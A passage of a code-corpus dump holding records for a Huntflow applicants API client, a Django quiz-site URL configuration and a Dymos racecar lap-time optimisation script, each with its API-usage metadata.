"call"}, {"api_name": "os.path", "line_number": 165, "usage_type": "attribute"}, {"api_name": "oauth2client.client.flow_from_clientsecrets", "line_number": 167, "usage_type": "call"}, {"api_name": "oauth2client.client", "line_number": 167, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 168, "usage_type": "call"}, {"api_name": "os.path", "line_number": 168, "usage_type": "attribute"}, {"api_name": "oauth2client.tools.run_flow", "line_number": 169, "usage_type": "call"}, {"api_name": "oauth2client.tools", "line_number": 169, "usage_type": "name"}, {"api_name": "googleapiclient.discovery.build", "line_number": 170, "usage_type": "call"}, {"api_name": "googleapiclient.discovery", "line_number": 170, "usage_type": "name"}, {"api_name": "httplib2.Http", "line_number": 171, "usage_type": "call"}, {"api_name": "googleapiclient.errors.HttpError", "line_number": 187, "usage_type": "attribute"}, {"api_name": "googleapiclient.errors", "line_number": 187, "usage_type": "name"}, {"api_name": "sys.exit", "line_number": 188, "usage_type": "call"}, {"api_name": "googleapiclient.errors.HttpError", "line_number": 203, "usage_type": "attribute"}, {"api_name": "googleapiclient.errors", "line_number": 203, "usage_type": "name"}, {"api_name": "sys.exit", "line_number": 204, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 215, "usage_type": "call"}, {"api_name": "os.path", "line_number": 215, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 217, "usage_type": "call"}, {"api_name": "os.path.basename", "line_number": 219, "usage_type": "call"}, {"api_name": "os.path", "line_number": 219, "usage_type": "attribute"}, {"api_name": "mimetypes.guess_type", "line_number": 220, "usage_type": "call"}, {"api_name": "googleapiclient.http.MediaFileUpload", "line_number": 227, "usage_type": "call"}, {"api_name": "googleapiclient.errors.HttpError", "line_number": 236, "usage_type": "attribute"}, {"api_name": "googleapiclient.errors", "line_number": 236, "usage_type": "name"}, {"api_name": "sys.exit", "line_number": 238, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 266, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 266, "usage_type": "attribute"}, {"api_name": "os.scandir", "line_number": 277, "usage_type": "call"}, {"api_name": "os.path.splitext", "line_number": 280, "usage_type": "call"}, {"api_name": "os.path", "line_number": 280, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 287, "usage_type": "call"}, {"api_name": "os.path", "line_number": 287, "usage_type": "attribute"}, {"api_name": "os.path.relpath", "line_number": 290, "usage_type": "call"}, {"api_name": "os.path", "line_number": 290, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 290, "usage_type": "call"}, {"api_name": "yaml.safe_load", "line_number": 314, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 322, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 322, "usage_type": "attribute"}, {"api_name": "xlsxwriter.Workbook", "line_number": 323, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 384, "usage_type": "call"}, {"api_name": "os.path", "line_number": 384, "usage_type": "attribute"}, {"api_name": "os.getcwd", "line_number": 384, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 396, "usage_type": "call"}, {"api_name": "os.path", "line_number": 396, "usage_type": "attribute"}, {"api_name": "os.getcwd", "line_number": 396, "usage_type": "call"}, {"api_name": "yaml.safe_load", "line_number": 403, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 431, "usage_type": "call"}, {"api_name": "os.path", "line_number": 431, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 431, "usage_type": "call"}, {"api_name": "os.path.basename", "line_number": 432, "usage_type": "call"}, {"api_name": "os.path", "line_number": 432, "usage_type": "attribute"}, {"api_name": "zipfile.ZipFile", "line_number": 433, "usage_type": "call"}, {"api_name": "os.walk", "line_number": 434, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 437, "usage_type": "call"}, {"api_name": "os.path", "line_number": 437, "usage_type": "attribute"}, {"api_name": "os.path.relpath", "line_number": 438, "usage_type": "call"}, {"api_name": "os.path", "line_number": 438, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 438, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 439, "usage_type": "call"}, {"api_name": "os.path", "line_number": 439, "usage_type": "attribute"}, {"api_name": "os.scandir", "line_number": 447, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 451, "usage_type": "call"}, {"api_name": "os.path", "line_number": 451, "usage_type": "attribute"}, {"api_name": "os.path.relpath", "line_number": 453, "usage_type": "call"}, {"api_name": "os.path", "line_number": 453, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 453, "usage_type": "call"}, {"api_name": "shutil.rmtree", "line_number": 455, "usage_type": "call"}, {"api_name": "shutil.rmtree", "line_number": 470, "usage_type": "call"}, {"api_name": "sys.platform", "line_number": 472, "usage_type": "attribute"}, {"api_name": "shutil.copytree", "line_number": 474, "usage_type": "call"}, {"api_name": "xmlrpc.client.ServerProxy", "line_number": 487, "usage_type": "call"}, {"api_name": "os.path.splitext", "line_number": 499, "usage_type": "call"}, {"api_name": "os.path", "line_number": 499, "usage_type": "attribute"}, {"api_name": "pathlib.Path", "line_number": 508, "usage_type": "call"}, {"api_name": "os.path.dirname", "line_number": 508, "usage_type": "call"}, {"api_name": "os.path", "line_number": 508, "usage_type": "attribute"}, {"api_name": "logging.exception", "line_number": 514, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 516, "usage_type": "call"}, {"api_name": "os.path", "line_number": 516, "usage_type": "attribute"}, {"api_name": "os.walk", "line_number": 522, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 522, "usage_type": "call"}, {"api_name": "os.path", "line_number": 522, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 526, "usage_type": "call"}, {"api_name": "os.path", "line_number": 526, "usage_type": "attribute"}, {"api_name": "os.scandir", "line_number": 531, "usage_type": "call"}, {"api_name": "shutil.rmtree", "line_number": 534, "usage_type": "call"}, {"api_name": "git.Repo", "line_number": 546, "usage_type": "call"}, {"api_name": "os.path.abspath", "line_number": 574, "usage_type": "call"}, {"api_name": "os.path", "line_number": 574, "usage_type": "attribute"}, {"api_name": "os.path.isabs", "line_number": 579, "usage_type": "call"}, {"api_name": "os.path", "line_number": 579, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 580, "usage_type": "call"}, {"api_name": "os.path", "line_number": 580, "usage_type": "attribute"}, {"api_name": "os.path.abspath", "line_number": 582, "usage_type": "call"}, {"api_name": "os.path", "line_number": 582, "usage_type": "attribute"}, {"api_name": "subprocess.Popen", "line_number": 615, "usage_type": "call"}, {"api_name": "subprocess.PIPE", "line_number": 617, "usage_type": "attribute"}, {"api_name": "subprocess.Popen", "line_number": 626, "usage_type": "call"}, {"api_name": "subprocess.PIPE", "line_number": 630, "usage_type": "attribute"}, {"api_name": "re.findall", "line_number": 633, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 642, "usage_type": "call"}, {"api_name": "shutil.copytree", "line_number": 660, "usage_type": "call"}, {"api_name": "shutil.rmtree", "line_number": 661, "usage_type": "call"}]}
+{"seq_id": "9837962734", "text": "from typing import Any, Dict, List, Optional, Union\n\nfrom huntflow_api_client.entities.base import (\n BaseEntity,\n CreateEntityMixin,\n GetEntityMixin,\n ListEntityMixin,\n)\nfrom huntflow_api_client.models.consts import AgreementState, ApplicantSearchField\nfrom huntflow_api_client.models.request.applicants import (\n ApplicantCreateRequest,\n ApplicantUpdateRequest,\n)\nfrom huntflow_api_client.models.response.applicants import (\n ApplicantCreateResponse,\n ApplicantItem,\n ApplicantListResponse,\n ApplicantSearchByCursorResponse,\n)\n\n\nclass Applicant(BaseEntity, ListEntityMixin, CreateEntityMixin, GetEntityMixin):\n async def list(\n self,\n account_id: int,\n count: Optional[int] = 30,\n page: Optional[int] = 1,\n status: Optional[int] = None,\n vacancy_id: Optional[int] = None,\n agreement_state: Optional[AgreementState] = None,\n ) -> ApplicantListResponse:\n \"\"\"\n API method reference https://api.huntflow.ai/v2/docs#get-/accounts/-account_id-/applicants\n\n :param account_id: Organization ID\n :param count: Number of items per page\n :param page: Page number\n :param status: Vacancy status ID\n :param vacancy_id: Vacancy ID\n :param agreement_state: Agreement's state of applicant to personal data processing.\n Available if the Personal Data module is enabled for organization.\n Cannot be supplied if the status parameter is passed.\n :return: List of applicants with pagination\n \"\"\"\n params: Dict[str, Any] = {\"count\": count, \"page\": page}\n if status:\n params[\"status\"] = status\n if vacancy_id:\n params[\"vacancy_id\"] = vacancy_id\n if agreement_state:\n params[\"agreement_state\"] = agreement_state.value\n response = await self._api.request(\n \"GET\",\n f\"/accounts/{account_id}/applicants\",\n params=params,\n )\n return ApplicantListResponse.model_validate(response.json())\n\n async def create(\n self,\n account_id: int,\n data: ApplicantCreateRequest,\n ) -> ApplicantCreateResponse:\n \"\"\"\n API method reference https://api.huntflow.ai/v2/docs#post-/accounts/-account_id-/applicants\n\n :param account_id: Organization ID\n :param data: Applicant data\n :return: The created applicant\n \"\"\"\n response = await self._api.request(\n \"POST\",\n f\"/accounts/{account_id}/applicants\",\n json=data.jsonable_dict(exclude_none=True),\n )\n return ApplicantCreateResponse.model_validate(response.json())\n\n async def get(self, account_id: int, applicant_id: int) -> ApplicantItem:\n \"\"\"\n API method reference\n https://api.huntflow.ai/v2/docs#get-/accounts/-account_id-/applicants/-applicant_id-\n\n :param account_id: Organization ID\n :param applicant_id: Applicant ID\n :return: The specified applicant\n \"\"\"\n response = await self._api.request(\n \"GET\",\n f\"/accounts/{account_id}/applicants/{applicant_id}\",\n )\n return ApplicantItem.model_validate(response.json())\n\n async def patch(\n self,\n account_id: int,\n applicant_id: int,\n data: ApplicantUpdateRequest,\n ) -> ApplicantItem:\n \"\"\"\n API method reference\n https://api.huntflow.ai/v2/docs#patch-/accounts/-account_id-/applicants/-applicant_id-\n\n :param account_id: Organization ID\n :param applicant_id: Applicant ID\n :param data: Applicant data\n :return: The created applicant\n \"\"\"\n response = await self._api.request(\n \"PATCH\",\n f\"/accounts/{account_id}/applicants/{applicant_id}\",\n json=data.jsonable_dict(exclude_none=True),\n )\n return ApplicantItem.model_validate(response.json())\n\n async def delete(self, account_id: int, applicant_id: int) -> None:\n \"\"\"\n API method reference\n https://api.huntflow.ai/v2/docs#delete-/accounts/-account_id-/applicants/-applicant_id-\n\n :param account_id: Organization ID\n :param applicant_id: Applicant ID\n \"\"\"\n await self._api.request(\n \"DELETE\",\n f\"/accounts/{account_id}/applicants\" f\"/{applicant_id}\",\n )\n\n async def search_by_cursor(\n self,\n account_id: int,\n next_page_cursor: Optional[str] = None,\n query: Optional[str] = None,\n tag: Optional[List[int]] = None,\n status: Optional[List[int]] = None,\n rejection_reason: Optional[List[int]] = None,\n vacancy: Union[List[int], None] = None,\n only_current_status: bool = False,\n account_source: Optional[List[int]] = None,\n field: ApplicantSearchField = ApplicantSearchField.all,\n count: int = 30,\n ) -> ApplicantSearchByCursorResponse:\n \"\"\"\n API method reference:\n https://api.huntflow.ai/v2/docs#get-/accounts/-account_id-/applicants/search_by_cursor\n\n :param account_id: Organization ID\n :param next_page_cursor: A cursor to the next page,\n if specified, no other params will be included\n :param query: Search query\n :param tag: List of tag ID\n :param status: List of vacancy status ID\n :param rejection_reason: List of rejection reason ID\n :param vacancy: List of vacancy ID's or None\n - None - no filter for vacancies\n - [] - empty list means applicant is not assigned to any vacancy\n - [1, 2, 3] - applicants assigned to specified vacancies\n :param only_current_status: If the value is set to True,\n then applicants who are currently at this status will be displayed.\n :param account_source: List of resume source ID\n :param field: Search field\n :param count: Number of items per page\n\n :return: Returns a list of found applicants and a cursor to the next page\n \"\"\"\n\n path = f\"/accounts/{account_id}/applicants/search_by_cursor\"\n\n params: Dict[str, Any]\n if next_page_cursor is not None:\n params = {\"next_page_cursor\": next_page_cursor}\n else:\n params = {\n \"tag\": tag or [],\n \"status\": status or [],\n \"rejection_reason\": rejection_reason or [],\n \"only_current_status\": only_current_status,\n \"field\": field.value,\n \"count\": count,\n \"account_source\": account_source or [],\n }\n if query:\n params[\"q\"] = query\n\n if vacancy is not None:\n params[\"vacancy\"] = vacancy if vacancy else \"null\"\n\n response = await self._api.request(\"GET\", path, params=params)\n return ApplicantSearchByCursorResponse.model_validate(response.json())\n", "repo_name": "huntflow/huntflow-api-client-python", "sub_path": "huntflow_api_client/entities/applicants.py", "file_name": "applicants.py", "file_ext": "py", "file_size_in_byte": 6966, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "31", "api": [{"api_name": "huntflow_api_client.entities.base.BaseEntity", "line_number": 22, "usage_type": "name"}, {"api_name": "huntflow_api_client.entities.base.ListEntityMixin", "line_number": 22, "usage_type": "name"}, {"api_name": "huntflow_api_client.entities.base.CreateEntityMixin", "line_number": 22, "usage_type": "name"}, {"api_name": "huntflow_api_client.entities.base.GetEntityMixin", "line_number": 22, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 26, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 27, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 28, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 29, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 30, "usage_type": "name"}, {"api_name": "huntflow_api_client.models.consts.AgreementState", "line_number": 30, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 45, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 45, "usage_type": "name"}, {"api_name": "huntflow_api_client.models.response.applicants.ApplicantListResponse.model_validate", "line_number": 57, "usage_type": "call"}, {"api_name": "huntflow_api_client.models.response.applicants.ApplicantListResponse", "line_number": 57, "usage_type": "name"}, {"api_name": "huntflow_api_client.models.response.applicants.ApplicantListResponse", "line_number": 31, "usage_type": "name"}, {"api_name": "huntflow_api_client.models.request.applicants.ApplicantCreateRequest", "line_number": 62, "usage_type": "name"}, {"api_name": "huntflow_api_client.models.response.applicants.ApplicantCreateResponse.model_validate", "line_number": 76, "usage_type": "call"}, {"api_name": "huntflow_api_client.models.response.applicants.ApplicantCreateResponse", "line_number": 76, "usage_type": "name"}, {"api_name": "huntflow_api_client.models.response.applicants.ApplicantCreateResponse", "line_number": 63, "usage_type": "name"}, {"api_name": "huntflow_api_client.models.response.applicants.ApplicantItem.model_validate", "line_number": 91, "usage_type": "call"}, {"api_name": "huntflow_api_client.models.response.applicants.ApplicantItem", "line_number": 91, "usage_type": "name"}, {"api_name": "huntflow_api_client.models.response.applicants.ApplicantItem", "line_number": 78, "usage_type": "name"}, {"api_name": "huntflow_api_client.models.request.applicants.ApplicantUpdateRequest", "line_number": 97, "usage_type": "name"}, {"api_name": "huntflow_api_client.models.response.applicants.ApplicantItem.model_validate", "line_number": 113, "usage_type": "call"}, {"api_name": "huntflow_api_client.models.response.applicants.ApplicantItem", "line_number": 113, "usage_type": "name"}, {"api_name": "huntflow_api_client.models.response.applicants.ApplicantItem", "line_number": 98, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 131, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 132, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 133, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 133, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 134, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 134, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 135, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 135, "usage_type": "name"}, {"api_name": "typing.Union", "line_number": 136, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 136, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 138, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 138, "usage_type": "name"}, {"api_name": "huntflow_api_client.models.consts.ApplicantSearchField", "line_number": 139, "usage_type": "name"}, {"api_name": "huntflow_api_client.models.consts.ApplicantSearchField.all", "line_number": 139, "usage_type": "attribute"}, {"api_name": "typing.Dict", "line_number": 168, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 168, "usage_type": "name"}, {"api_name": "huntflow_api_client.models.response.applicants.ApplicantSearchByCursorResponse.model_validate", "line_number": 188, "usage_type": "call"}, {"api_name": "huntflow_api_client.models.response.applicants.ApplicantSearchByCursorResponse", "line_number": 188, "usage_type": "name"}, {"api_name": "huntflow_api_client.models.response.applicants.ApplicantSearchByCursorResponse", "line_number": 141, "usage_type": "name"}]}
+{"seq_id": "5253393129", "text": "from django.urls import path\nfrom . import views\n\nurlpatterns = [\n path('take-quiz', views.take_quiz, name='take-quiz'),\n path('signin', views.signin, name='signin'),\n path('quiz-list', views.quiz_list, name='quiz-list'),\n path('my-profile', views.my_account, name='learner-profile'),\n path('countdown', views.countdown, name='countdown'),\n path('signup', views.signup, name='learner-signup'),\n path('all-quiz', views.all_quiz, name='all-quiz'),\n path('quiz-result', views.result_page, name='quiz-result'),\n path('quiz-review', views.review_page, name='quiz-review'),\n path('generate', views.generate, name='generate-l'),\n path('', views.home_page, name='l-home'),\n path('practice-quiz', views.practice_quiz, name='practice-quiz'),\n path('logout', views.logout_l, name='l-logout'),\n path('live-list', views.live_list, name='live-list'),\n path('instructor-list', views.instructor_list, name='instructor-list'),\n path('instructor-profile', views.instructor_profile, name='instructor-profile')\n]\n", "repo_name": "Subodh7300/Quiz-Emporium", "sub_path": "quizsite/student/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 1041, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "django.urls.path", "line_number": 5, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 6, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 7, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 8, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 9, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 10, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 11, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 12, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 13, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 14, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 15, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 16, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 17, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 18, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 19, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 20, "usage_type": "call"}]}
+{"seq_id": "38506799219", "text": "import numpy as np\nimport openmdao.api as om\nimport dymos as dm\nimport matplotlib.pyplot as plt\nimport matplotlib as mpl\n\nfrom dymos.examples.racecar.combinedODE import CombinedODE\nfrom dymos.examples.racecar.spline import get_spline, get_track_points\nfrom dymos.examples.racecar.tracks import ovaltrack\n\nfrom paropt.paropt_sparse_driver import ParOptSparseDriver\n\n# change track here and in curvature.py. Tracks are defined in tracks.py\ntrack = ovaltrack\n\n# generate nodes along the centerline for curvature calculation (different\n# than collocation nodes)\npoints = get_track_points(track)\n\n# fit the centerline spline.\nfinespline, gates, gatesd, curv, slope = get_spline(points, s=0.0)\n\n# by default 10000 points\ns_final = track.get_total_length()\n\n# Define the OpenMDAO problem\np = om.Problem(model=om.Group())\n\n# Define a Trajectory object\ntraj = dm.Trajectory()\np.model.add_subsystem(\"traj\", subsys=traj)\n\n# Define a Dymos Phase object with GaussLobatto Transcription\nphase = dm.Phase(\n ode_class=CombinedODE,\n transcription=dm.GaussLobatto(num_segments=80, order=3, compressed=True),\n)\n\ntraj.add_phase(name=\"phase0\", phase=phase)\n\n# Set the time options, in this problem we perform a change of variables. So 'time' is\n# actually 's' (distance along the track centerline)\n# This is done to fix the collocation nodes in space, which saves us the calculation of\n# the rate of change of curvature.\n# The state equations are written with respect to time, the variable change occurs in\n# timeODE.py\nphase.set_time_options(\n fix_initial=True,\n fix_duration=True,\n duration_val=s_final,\n name=\"s\",\n targets=[\"curv.s\"],\n units=\"m\",\n duration_ref=s_final,\n duration_ref0=10,\n)\n\n# Set the reference values\nt_ref = 100.0\nn_ref = 4.0\nV_ref = 40.0\nlambda_ref = 0.01\nalpha_ref = 0.15\nomega_ref = 0.3\nax_ref = 8.0\nay_ref = 8.0\ndelta_ref = 0.04\nthrust_ref = 10.0\n\n# Define states\nphase.add_state(\n \"t\",\n ref=t_ref,\n units=\"s\",\n fix_initial=True,\n fix_final=False,\n lower=0.0,\n upper=10000.0,\n rate_source=\"dt_ds\",\n)\n\n# Normal distance to centerline. The bounds on n define the width of the track\nphase.add_state(\n \"n\",\n ref=n_ref,\n units=\"m\",\n fix_initial=False,\n fix_final=False,\n upper=4.0,\n lower=-4.0,\n rate_source=\"dn_ds\",\n targets=[\"n\"],\n)\n\n# velocity\nphase.add_state(\n \"V\",\n ref=V_ref,\n ref0=5,\n units=\"m/s\",\n fix_initial=False,\n fix_final=False,\n lower=-500.0,\n upper=500.0,\n rate_source=\"dV_ds\",\n targets=[\"V\"],\n)\n\n# vehicle heading angle with respect to centerline\nphase.add_state(\n \"alpha\",\n ref=alpha_ref,\n units=\"rad\",\n fix_initial=False,\n fix_final=False,\n lower=-0.5 * np.pi,\n upper=0.5 * np.pi,\n rate_source=\"dalpha_ds\",\n targets=[\"alpha\"],\n)\n\n# vehicle slip angle, or angle between the axis of the vehicle\n# and velocity vector (all cars drift a little)\nphase.add_state(\n \"lambda\",\n ref=lambda_ref,\n units=\"rad\",\n fix_initial=False,\n fix_final=False,\n lower=-0.5 * np.pi,\n upper=0.5 * np.pi,\n rate_source=\"dlambda_ds\",\n targets=[\"lambda\"],\n)\n\n# yaw rate\nphase.add_state(\n \"omega\",\n ref=omega_ref,\n units=\"rad/s\",\n fix_initial=False,\n fix_final=False,\n lower=-30.0,\n upper=30.0,\n rate_source=\"domega_ds\",\n targets=[\"omega\"],\n)\n\n# longitudinal acceleration\nphase.add_state(\n \"ax\",\n ref=ax_ref,\n units=\"m/s**2\",\n fix_initial=False,\n fix_final=False,\n lower=-100.0,\n upper=100.0,\n rate_source=\"dax_ds\",\n targets=[\"ax\"],\n)\n\n# Lateral acceleration\nphase.add_state(\n \"ay\",\n ref=ay_ref,\n units=\"m/s**2\",\n fix_initial=False,\n fix_final=False,\n lower=-100.0,\n upper=100.0,\n rate_source=\"day_ds\",\n targets=[\"ay\"],\n)\n\n# Define Controls\n\n# steering angle\nphase.add_control(\n name=\"delta\",\n ref=delta_ref,\n units=\"rad\",\n fix_initial=False,\n fix_final=False,\n lower=-0.5 * np.pi,\n upper=0.5 * np.pi,\n rate_continuity=True,\n)\n\n# the thrust controls the longitudinal force of the rear tires and is positive\n# while accelerating, negative while braking\nphase.add_control(\n name=\"thrust\",\n ref=thrust_ref,\n units=None,\n lower=-1000.0,\n upper=1000.0,\n fix_initial=False,\n fix_final=False,\n rate_continuity=True,\n)\n\n# Performance Constraints\npmax = 960000.0 # W\nphase.add_path_constraint(\"power\", upper=pmax, ref=100000.0) # engine power limit\n\n# The following four constraints are the tire friction limits, with 'rr' designating the\n# rear right wheel etc. This limit is computed in tireConstraintODE.py\nphase.add_path_constraint(\"c_rr\", upper=1.0)\nphase.add_path_constraint(\"c_rl\", upper=1.0)\nphase.add_path_constraint(\"c_fr\", upper=1.0)\nphase.add_path_constraint(\"c_fl\", upper=1.0)\n\n# Some of the vehicle design parameters are available to set here. Other parameters can\n# be found in their respective ODE files.\n# vehicle mass\nphase.add_parameter(\n \"M\",\n val=800.0,\n units=\"kg\",\n opt=False,\n targets=[\"car.M\", \"tire.M\", \"tireconstraint.M\", \"normal.M\"],\n static_target=True,\n)\n\n# brake bias\nphase.add_parameter(\n \"beta\", val=0.62, units=None, opt=False, targets=[\"tire.beta\"], static_target=True\n)\n\n# center of pressure location\nphase.add_parameter(\n \"CoP\", val=1.6, units=\"m\", opt=False, targets=[\"normal.CoP\"], static_target=True\n)\n\n# center of gravity height\nphase.add_parameter(\n \"h\", val=0.3, units=\"m\", opt=False, targets=[\"normal.h\"], static_target=True\n)\n\n# roll stiffness\nphase.add_parameter(\n \"chi\", val=0.5, units=None, opt=False, targets=[\"normal.chi\"], static_target=True\n)\n\n# downforce coefficient*area\nphase.add_parameter(\n \"ClA\", val=4.0, units=\"m**2\", opt=False, targets=[\"normal.ClA\"], static_target=True\n)\n\n# drag coefficient*area\nphase.add_parameter(\n \"CdA\", val=2.0, units=\"m**2\", opt=False, targets=[\"car.CdA\"], static_target=True\n)\n\n# Minimize final time.\n# note that we use the 'state' time instead of Dymos 'time'\nphase.add_objective(\"t\", loc=\"final\")\n\n# Add output timeseries\nphase.add_timeseries_output(\"*\")\nphase.add_timeseries_output(\"t\", output_name=\"time\")\n\n# Link the states at the start and end of the phase in order to ensure a continous lap\ntraj.link_phases(\n phases=[\"phase0\", \"phase0\"],\n vars=[\"V\", \"n\", \"alpha\", \"omega\", \"lambda\", \"ax\", \"ay\"],\n locs=[\"final\", \"initial\"],\n connected=True,\n)\n\n# Set up the optimization driver\np.driver = ParOptSparseDriver()\n\noptions = {\n \"algorithm\": \"ip\",\n \"norm_type\": \"infinity\",\n \"qn_type\": \"bfgs\",\n \"qn_subspace_size\": 10,\n \"starting_point_strategy\": \"least_squares_multipliers\",\n \"qn_update_type\": \"damped_update\",\n \"abs_res_tol\": 1e-6,\n \"barrier_strategy\": \"monotone\",\n \"armijo_constant\": 1e-5,\n \"penalty_gamma\": 100.0,\n \"max_major_iters\": 500,\n}\n\nfor key in options:\n p.driver.options[key] = options[key]\n\n# Allow OpenMDAO to automatically determine our sparsity pattern.\n# Doing so can significant speed up the execution of Dymos.\np.driver.declare_coloring(show_summary=True, show_sparsity=False)\n\n# Setup the problem\np.setup(check=True)\n\n# States\n# Nonzero velocity to avoid division by zero errors\np.set_val(\"traj.phase0.states:V\", phase.interp(\"V\", [20, 20]), units=\"m/s\")\n\n# All other states start at 0\np.set_val(\n \"traj.phase0.states:lambda\", phase.interp(\"lambda\", [0.01, 0.01]), units=\"rad\"\n)\np.set_val(\"traj.phase0.states:omega\", phase.interp(\"omega\", [0.0, 0.0]), units=\"rad/s\")\np.set_val(\"traj.phase0.states:alpha\", phase.interp(\"alpha\", [0.0, 0.0]), units=\"rad\")\np.set_val(\"traj.phase0.states:ax\", phase.interp(\"ax\", [0.0, 0.0]), units=\"m/s**2\")\np.set_val(\"traj.phase0.states:ay\", phase.interp(\"ay\", [0.0, 0.0]), units=\"m/s**2\")\np.set_val(\"traj.phase0.states:n\", phase.interp(\"n\", [0.0, 0.0]), units=\"m\")\n\n# initial guess for what the final time should be\np.set_val(\"traj.phase0.states:t\", phase.interp(\"t\", [0.0, 100.0]), units=\"s\")\n\n# Controls\n# A small amount of thrust can speed up convergence\np.set_val(\"traj.phase0.controls:delta\", phase.interp(\"delta\", [0.0, 0.0]), units=\"rad\")\np.set_val(\"traj.phase0.controls:thrust\", phase.interp(\"thrust\", [0.1, 0.1]), units=None)\n\np.run_driver()\nprint(\"Optimization finished\")\n\n# Get optimized time series\nn = p.get_val(\"traj.phase0.timeseries.states:n\")\ns = p.get_val(\"traj.phase0.timeseries.s\")\nV = p.get_val(\"traj.phase0.timeseries.states:V\")\nthrust = p.get_val(\"traj.phase0.timeseries.controls:thrust\")\ndelta = p.get_val(\"traj.phase0.timeseries.controls:delta\")\npower = p.get_val(\"traj.phase0.timeseries.power\", units=\"W\")\n\nprint(\"Plotting\")\n\n# Plot the main vehicle telemetry\nfig, axes = plt.subplots(nrows=4, ncols=1, figsize=(15, 8))\n\n# Velocity vs s\naxes[0].plot(s, p.get_val(\"traj.phase0.timeseries.states:V\"), label=\"solution\")\n\naxes[0].set_xlabel(\"s (m)\")\naxes[0].set_ylabel(\"V (m/s)\")\naxes[0].grid()\naxes[0].set_xlim(0, s_final)\n\n# n vs s\naxes[1].plot(\n s, p.get_val(\"traj.phase0.timeseries.states:n\", units=\"m\"), label=\"solution\"\n)\n\naxes[1].set_xlabel(\"s (m)\")\naxes[1].set_ylabel(\"n (m)\")\naxes[1].grid()\naxes[1].set_xlim(0, s_final)\n\n# throttle vs s\naxes[2].plot(s, thrust)\n\naxes[2].set_xlabel(\"s (m)\")\naxes[2].set_ylabel(\"thrust\")\naxes[2].grid()\naxes[2].set_xlim(0, s_final)\n\n# delta vs s\naxes[3].plot(\n s, p.get_val(\"traj.phase0.timeseries.controls:delta\", units=None), label=\"solution\"\n)\n\naxes[3].set_xlabel(\"s (m)\")\naxes[3].set_ylabel(\"delta\")\naxes[3].grid()\naxes[3].set_xlim(0, s_final)\n\nplt.tight_layout()\n\n# Performance constraint plot. Tire friction and power constraints\nfig, axes = plt.subplots(nrows=1, ncols=1, figsize=(15, 4))\nplt.subplots_adjust(right=0.82, bottom=0.14, top=0.97, left=0.07)\n\naxes.plot(s, p.get_val(\"traj.phase0.timeseries.c_fl\", units=None), label=\"c_fl\")\naxes.plot(s, p.get_val(\"traj.phase0.timeseries.c_fr\", units=None), label=\"c_fr\")\naxes.plot(s, p.get_val(\"traj.phase0.timeseries.c_rl\", units=None), label=\"c_rl\")\naxes.plot(s, p.get_val(\"traj.phase0.timeseries.c_rr\", units=None), label=\"c_rr\")\n\naxes.plot(s, power / pmax, label=\"Power\")\n\naxes.legend(bbox_to_anchor=(1.04, 0.5), loc=\"center left\")\naxes.set_xlabel(\"s (m)\")\naxes.set_ylabel(\"Performance constraints\")\naxes.grid()\naxes.set_xlim(0, s_final)\n\nplt.show()\n", "repo_name": "smdogroup/paropt", "sub_path": "examples/dymos/racecar/racecar.py", "file_name": "racecar.py", "file_ext": "py", "file_size_in_byte": 10178, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 29, "dataset": 